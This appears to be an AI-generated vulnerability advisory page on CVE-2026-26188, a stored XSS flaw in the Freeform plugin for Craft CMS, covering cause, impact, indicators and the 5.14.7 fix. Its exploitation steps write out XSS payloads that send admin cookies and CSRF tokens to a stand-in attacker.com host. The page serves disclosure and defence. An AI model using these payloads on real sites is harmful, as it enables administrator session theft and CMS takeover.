CVE-2026-26188: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-26188 is a stored Cross-Site Scripting (XSS) vulnerability in the Solspace Freeform plugin for Craft CMS 5.x. An authenticated, low-privilege user with form creation or editing permissions can inject arbitrary HTML and JavaScript into the Craft Control Panel (CP) builder and integrations views, which then executes in the browser of any administrator who views those screens. The vulnerability affects all Freeform 5.x versions from 5.0.0 through 5.14.6, and was fixed in version 5.14.7 released January 28, 2026. It carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Feedly).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically the use of React's dangerouslySetInnerHTML to render user-controlled strings — including field labels, section labels, integration icons, short names, and WYSIWYG previews — without any sanitization (GitHub Advisory). The vulnerable code is present in the bundled CP JavaScript at packages/plugin/src/Resources/js/client/client.js. An attacker with low-privilege access (e.g., a form editor role) crafts a malicious payload in a form field label or integration metadata field; the payload is stored server-side and executes in the admin's browser when the builder or integrations view is loaded. Exploitation requires network access to the Craft CP and a valid low-privilege account, plus passive interaction from an administrator viewing the affected screens.

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of an administrator's browser session within the Craft Control Panel. This can lead to session and CSRF token theft, enabling full administrative account takeover, unauthorized modification of plugin configurations, and potential further compromise of the Craft CMS installation (GitHub Advisory). Because the payload is stored persistently, it executes every time any admin views the affected builder or integration screens, amplifying the risk beyond a single exploitation event.

Exploitability

A proof-of-concept (PoC) is publicly documented in the GitHub Security Advisory, including two specific payloads: injecting <script>alert('xss')</script> as a field label and setting an integration icon SVG to <svg onload=alert('xss-icon')> (GitHub Advisory). There is no evidence of active in-the-wild exploitation at this time. The EPSS score is approximately 0.044% (0.000440), indicating low probability of near-term exploitation. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog.

Exploitation steps

  1. Obtain low-privilege access: Authenticate to the Craft CMS Control Panel with an account that has form creation or editing permissions.
  2. Inject payload via field label: Navigate to the Freeform form builder, create or edit a form field, and set its label to a malicious payload such as <script>alert(document.cookie)</script> or <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>.
  3. Inject payload via integration metadata: Alternatively, set an integration's icon SVG field to <svg onload="fetch('https://attacker.com/?token='+document.querySelector('[name=CRAFT_CSRF_TOKEN]').value)"> to capture CSRF tokens.
  4. Save the form or integration: Submit the changes; the malicious payload is stored server-side without sanitization.
  5. Wait for admin interaction: When any administrator opens the Freeform builder or integrations view in the CP, the stored payload executes in their browser context.
  6. Harvest credentials or escalate: Use the captured session cookies or CSRF tokens to perform authenticated actions as the administrator, potentially achieving full CMS takeover (GitHub Advisory).

Indicators of compromise

  • Logs: Craft CMS access logs showing low-privilege user accounts making POST requests to form builder or integration configuration endpoints with unusually long or HTML/script-containing field label values.
  • File System: Review stored form configurations or database entries for field labels, section labels, integration icon SVGs, or short names containing <script>, onerror=, onload=, javascript:, or other event handler patterns.
  • Network: Outbound HTTP requests from administrator browsers to unexpected external domains shortly after accessing the Freeform builder or integrations CP views, potentially carrying cookie or token data in query parameters.
  • Process/Application: Unexpected administrative actions (new admin accounts created, plugin settings changed, files uploaded) occurring without corresponding legitimate admin activity, suggesting session hijacking via stolen tokens.

Mitigation and workarounds

Upgrade the Solspace Freeform plugin to version 5.14.7 or later, which resolves the stored XSS vulnerabilities by sanitizing user-controlled strings before rendering (GitHub Release, GitHub Commit). As an interim workaround prior to patching, restrict form creation and editing permissions exclusively to trusted administrators, eliminating the low-privilege attack surface (GitHub Advisory). Additionally, implementing a Content Security Policy (CSP) that disallows inline scripts provides defense-in-depth, and reviewing access logs for suspicious form or integration modifications by low-privilege users is recommended.

Community reactions

The vulnerability was discovered and reported by security researcher Pr4v33N-Sec (LinkedIn: praveenkavinda), who is credited in the official GitHub Security Advisory (GitHub Advisory). The advisory was published by the Solspace maintainer team on January 22, 2026, with a patch released on January 28, 2026. Coverage has appeared on security aggregation sites including Vulners, INCIBE-CERT, and radar.offseq.com, reflecting routine community tracking of the disclosure.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management